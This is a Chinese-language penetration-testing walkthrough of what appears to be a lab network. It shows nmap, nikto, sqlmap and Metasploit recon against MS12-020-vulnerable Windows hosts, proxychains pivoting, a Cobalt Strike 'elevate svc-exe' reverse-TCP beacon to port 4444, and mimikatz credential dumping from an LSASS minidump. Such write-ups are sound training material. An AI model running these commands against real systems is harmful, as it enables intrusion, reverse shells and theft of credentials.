┌──(kali㉿kali)-[~/Desktop] └─$ nmap -sV 192.168.1.99 --script=vuln Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-30 04:30 EDT Stats: 0:06:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan Nmap scan report for WIN-7DSM1JVE9PO (192.168.1.99) Host is up (0.0011s latency). Not shown: 993 filtered tcp ports (no-response), 2 filtered tcp ports (host-unreach) PORT STATE SERVICE VERSION 80/tcp open tcpwrapped |_http-server-header: Microsoft-IIS/7.5 | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 3389/tcp open ssl/ms-wbt-server? | rdp-vuln-ms12-020: | VULNERABLE: | MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2012-0152 | Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P) | Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service. | | Disclosure date: 2012-03-13 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152 | http://technet.microsoft.com/en-us/security/bulletin/ms12-020 | | MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2012-0002 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system. | | Disclosure date: 2012-03-13 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002 |_ http://technet.microsoft.com/en-us/security/bulletin/ms12-020 |_ssl-ccs-injection: No reply from server (TIMEOUT) 49154/tcp open unknown Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results: |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF |_smb-vuln-ms10-054: false
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 554.63 seconds
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker 1 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
使用auxiliary/scanner/rdp/ms12_020_check模块。
1 2 3 4 5 6 7 8
msf6 > use auxiliary/scanner/rdp/ms12_020_check msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.1.99 rhosts => 192.168.1.99 msf6 auxiliary(scanner/rdp/ms12_020_check) > exploit
[+] 192.168.1.99:3389 - 192.168.1.99:3389 - The target is vulnerable. [*] 192.168.1.99:3389 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
这里显示The target is vulnerable.(目标很脆弱。),但是我找到该漏洞的exp并不能对目标造成影响。接下来我们继续尝试另外一个模块。
┌──(kali㉿kali)-[~/Desktop] └─$ nikto -host http://192.168.1.99 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.1.99 + Target Hostname: 192.168.1.99 + Target Port: 80 + Start Time: 2022-06-30 05:33:14 (GMT-4) --------------------------------------------------------------------------- + Server: Microsoft-IIS/7.5 + Retrieved x-aspnet-version header: 2.0.50727 + Retrieved x-powered-by header: ASP.NET + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + 8068 requests: 0 error(s) and 7 item(s) reported on remote host + End Time: 2022-06-30 05:34:13 (GMT-4) (59 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 06:05:41 /2022-06-30/ [06:05:42] [INFO] resuming back-end DBMS 'microsoft sql server' ... [06:09:00] [CRITICAL] connection timed out to the target URL [*] ending @ 06:09:00 /2022-06-30/
写入shell
自动化不能使用只能靠手动了。利用--sql-shell是执行数据库语句。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
┌──(kali㉿kali)-[~/Desktop] └─$ sqlmap "http://192.168.1.99?user_id=1" --sql-shell ___ __H__ ___ ___[,]_____ ___ ___ {1.6.6#stable} |_ -| . [(] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 06:44:35 /2022-06-30/ ... [06:44:35] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 7 or 2008 R2 web application technology: ASP.NET 2.0.50727, Microsoft IIS 7.5, ASP.NET back-end DBMS: Microsoft SQL Server 2008 [06:44:35] [INFO] calling Microsoft SQL Server shell. To quit type'x' or 'q' and press ENTER sql-shell>
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 10:10:47 /2022-06-30/ [10:10:47] [INFO] flushing session file ... Database: FoundStone_Bank Table: tmp [6 entries] +----------------+ | dir | +----------------+ | custerr | | edrfgyhujikopl | | history | | logs | | temp | | wwwroot | +----------------+ [10:11:27] [INFO] table 'FoundStone_Bank.dbo.tmp' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.1.99/dump/FoundStone_Bank/tmp.csv' [10:11:27] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 61 times [10:11:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.99' [*] ending @ 10:11:27 /2022-06-30/
┌──(kali㉿kali)-[~/Downloads] └─$ proxychains4 nmap -sV 192.168.153.128 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 05:56 EDT [proxychains] Strict chain ... 127.0.0.1:23869 ... 192.168.153.128:80 ... OK [proxychains] Strict chain ... 127.0.0.1:23869 ... 192.168.153.128:53 <--denied [proxychains] Strict chain ... 127.0.0.1:23869 ... 192.168.153.128:1025 <--denied [proxychains] Strict chain ... 127.0.0.1:23869 ... 192.168.153.128:5900 <--denied [proxychains] Strict chain ... 127.0.0.1:23869 ... 192.168.153.128:554 <--denied [proxychains] Strict chain ... 127.0.0.1:23869 ... 192.168.153.128:113 <--denied [proxychains] Strict chain ... 127.0.0.1:23869 ... 192.168.153.128:1720 <--denied [proxychains] Strict chain ... 127.0.0.1:23869 ... 192.168.153.128:25 <--denied ... Nmap scan report for 192.168.153.128 Host is up (1.1s latency). Not shown: 988 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: WIN-HF4NQED9HKF; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1213.51 seconds
┌──(kali㉿kali)-[~/Downloads] └─$ proxychains4 nmap -sV 192.168.153.128 -p80,135,139,445,3389,5357,49152-49158 --script=vuln [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-02 02:13 EDT [proxychains] Strict chain ... 127.0.0.1:45483 ... 192.168.153.128:80 ... OK [proxychains] Strict chain ... 127.0.0.1:45483 ... 192.168.153.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:45483 ... 192.168.153.128:3389 ... OK [proxychains] Strict chain ... 127.0.0.1:45483 ... 192.168.153.128:135 ... OK ... Nmap scan report for 192.168.153.128 Host is up (1.6s latency).
PORT STATE SERVICE VERSION 80/tcp open http Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 |_http-trace: TRACE is enabled |_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. 135/tcp open msrpc? 139/tcp open netbios-ssn? 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server? | rdp-vuln-ms12-020: | VULNERABLE: | MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2012-0152 | Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P) | Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service. | | Disclosure date: 2012-03-13 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152 | http://technet.microsoft.com/en-us/security/bulletin/ms12-020 | | MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2012-0002 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system. | | Disclosure date: 2012-03-13 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002 |_ http://technet.microsoft.com/en-us/security/bulletin/ms12-020 |_ssl-ccs-injection: No reply from server (TIMEOUT) 5357/tcp open wsdapi? 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp closed unknown 49158/tcp open unknown Host script results: |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED |_smb-vuln-ms10-054: false Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1188.52 seconds
通过上面的返回结果我们可以发现这里和Windows Server 2008有相同的漏洞,接下来我们就使用msfconsole的漏洞利用模块验证是否可以使用。
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker 1 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
使用auxiliary/scanner/rdp/ms12_020_check模块。
1 2 3 4 5 6 7 8 9 10
msf6 > use auxiliary/scanner/rdp/ms12_020_check msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.153.128 rhosts => 192.168.153.128 msf6 auxiliary(scanner/rdp/ms12_020_check) > exploit
[proxychains] Strict chain ... 127.0.0.1:45483 ... 192.168.153.128:3389 ... OK
[+] 192.168.153.128:3389 - 192.168.153.128:3389 - The target is vulnerable. [*] 192.168.153.128:3389 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
这里显示The target is vulnerable.(目标很脆弱。),但是我找到该漏洞的exp并不能对目标造成影响。接下来我们继续尝试另外一个模块。
┌──(kali㉿kali)-[~/Downloads] └─$ proxychains4 nikto -host http://192.168.153.128 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 [proxychains] DLL init: proxychains-ng 4.16 - Nikto v2.1.6 --------------------------------------------------------------------------- [proxychains] Strict chain ... 127.0.0.1:45483 ... 192.168.153.128:80 ... OK + Target IP: 192.168.153.128 + Target Hostname: 192.168.153.128 + Target Port: 80 + Start Time: 2022-07-02 02:33:39 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 + Retrieved x-powered-by header: PHP/7.3.4 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type [proxychains] Strict chain ... 127.0.0.1:45483 ... 192.168.153.128:80 ... OK + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST - STATUS: Completed 3190 requests (~46% complete, 16.6 minutes left): currently in plugin 'Nikto Tests' - STATUS: Running average: 100 requests: 0.22830 sec, 10 requests: 0.1804 sec. + Scan terminated: 12 error(s) and 7 item(s) reported on remote host + End Time: 2022-07-02 03:13:08 (GMT-4) (2369 seconds)
接下来只能尝试使用certutil请求Windows Server 2008的开放的80端口(由于Windows 7不出网Windows Sever 2008刚好开放了80端口我们又有Windows Server 2008的权限,我们可以通过查看Windows Server 2008的IIS请求日志)。
beacon> shell dir C:\inetpub\logs\LogFiles\W3SVC1\ [*] Tasked beacon to run: dir C:\inetpub\logs\LogFiles\W3SVC1\ [+] host called home, sent: 67 bytes [+] received output: 驱动器 C 中的卷没有标签。 卷的序列号是 DCD2-557A
┌──(kali㉿kali)-[~/Desktop] └─$ proxychains4 nmap -p80 192.168.153.129 --script=vuln [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-02 09:12 EDT [proxychains] Strict chain ... 127.0.0.1:45483 ... 192.168.153.129:80 ... OK ... Nmap scan report for 192.168.153.129 Host is up (0.20s latency).
PORT STATE SERVICE 80/tcp open http |_http-trace: TRACE is enabled |_http-aspnet-debug: ERROR: Script execution failed (use -d to debug) |_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-phpself-xss: ERROR: Script execution failed (use -d to debug) Nmap done: 1 IP address (1 host up) scanned in 232.50 seconds
┌──(kali㉿kali)-[~/Desktop] └─$ proxychains4 nikto -host http://192.168.153.129 [proxychains] config file found: /etc/proxychains4.conf ... [proxychains] DLL init: proxychains-ng 4.16 - Nikto v2.1.6 --------------------------------------------------------------------------- ... + Target IP: 192.168.153.129 + Target Hostname: 192.168.153.129 + Target Port: 80 + Start Time: 2022-07-02 09:22:10 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 + Retrieved x-powered-by header: PHP/7.3.4 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'link' found, with contents: <http://192.168.153.129/index.php/wp-json/>; rel="https://api.w.org/" + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Uncommon header 'x-redirect-by' found, with contents: WordPress + Entry '/wp-admin/'in robots.txt returned a non-forbidden or redirect HTTP code (302) + "robots.txt" contains 2 entries which should be manually viewed. + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response + ERROR: Error limit (20) reached for host, giving up. Last error: + Scan terminated: 15 error(s) and 8 item(s) reported on remote host + End Time: 2022-07-02 09:33:10 (GMT-4) (660 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
[!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
beacon> elevate svc-exe b_192.168.153.130 [*] Tasked beacon to run windows/beacon_reverse_tcp (192.168.153.130:4444) via Service Control Manager (\\127.0.0.1\ADMIN$\ba77d60.exe) [+] host called home, sent: 285738 bytes [+] host called home, sent: 1819 bytes [+] received output: Started service ba77d60 on .
──(kali㉿kali)-[~/Desktop] └─$ wine /usr/share/windows-resources/mimikatz/x64/mimikatz.exe "sekurlsa::minidump e723ff153""sekurlsa::logonPasswords full"exit 0040:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ >>> INIT of 'kerberos' module failed : c0000001 0050:err:ole:start_rpcss Failed to open RpcSs service
mimikatz(commandline) # sekurlsa::minidump e723ff153 Switch to MINIDUMP : 'e723ff153'
mimikatz(commandline) # sekurlsa::logonPasswords full Opening : 'e723ff153' file for minidump... ERROR kuhl_m_sekurlsa_acquireLSA ; Local LSA library failed